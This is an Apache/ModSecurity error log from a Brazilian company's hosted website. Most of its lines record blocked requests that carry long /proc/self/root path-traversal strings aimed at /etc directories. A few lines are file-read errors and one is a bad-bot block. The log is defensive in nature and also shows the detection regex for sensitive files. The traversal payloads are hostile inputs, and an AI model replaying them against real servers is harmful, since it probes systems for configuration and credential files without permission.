[Fri Mar 20 08:45:25.243476 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:57724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zVLninkcc-iUj5Apl6gAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:45:32.511263 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:38940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zW9a6ubjKNq_cu4bd-AAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:45:34.303115 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:47304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0zXhCii7xarUs8iHZvogAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:45:49.057799 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 57.141.18.8:52910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:46:16.138016 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:54490] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:46:32.152617 2026] [mime_magic:error] [pid 7893:tid 140411616036608] (70014)End of file found: [client 57.141.18.41:55414] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:47:18.690047 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 57.141.18.12:58232] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:47:38.632422 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:33436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z2ta6ubjKNq_cu4bemQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:47:39.491016 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:33436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z29a6ubjKNq_cu4benAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:47:42.355420 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:49220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z3vHIg5MgXLBnicMAIgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:47:47.063472 2026] [:error] [pid 7893:tid 140411666392832] [client 216.73.216.191:59878] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/zulu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z4xCii7xarUs8iHZwMgAAAgk"]
[Fri Mar 20 08:47:48.649379 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:49236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z5Na6ubjKNq_cu4beqQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:47:58.866964 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:57620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z7uoXxyEfFpUF8f-KAgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:47:59.487563 2026] [:error] [pid 11167:tid 140411624429312] [client 216.73.216.191:60580] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z7_HIg5MgXLBnicMANgAAAc4"]
[Fri Mar 20 08:48:00.694080 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:41502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z8F1pVZ5mVmJwsFM6WgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:48:01.731466 2026] [:error] [pid 10189:tid 140411683178240] [client 216.73.216.191:60780] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z8TJ3M9BSuKP7CAYnZQAAAIc"]
[Fri Mar 20 08:48:04.679128 2026] [:error] [pid 21219:tid 140411582465792] [client 216.73.216.191:32800] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0z9PXLqtnMIWvjpaKj8gAAApM"]
[Fri Mar 20 08:48:05.741993 2026] [mime_magic:error] [pid 11167:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:60986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:48:30.200106 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:41514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00DDJ3M9BSuKP7CAYnkgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:48:31.874826 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:46604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00D_XLqtnMIWvjpaKkEwAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:48:33.457279 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:46618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00Eda6ubjKNq_cu4be2QAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:48:35.597857 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.228.61:36360] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab00EzJ3M9BSuKP7CAYnlwAAAIo"]
[Fri Mar 20 08:48:36.587833 2026] [mime_magic:error] [pid 31215:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:35010] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:48:38.112107 2026] [mime_magic:error] [pid 9818:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:35046] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:49:24.837312 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:46624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00RDJ3M9BSuKP7CAYn5AAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:49:26.315037 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:35494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00RhCii7xarUs8iHZwvgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:49:38.607141 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:35506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00UgF0L0L-SsrnPo5yQAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:49:44.123377 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:58690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00WF1pVZ5mVmJwsFM6zgAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:49:50.176977 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:58700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab00XhCii7xarUs8iHZxAQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
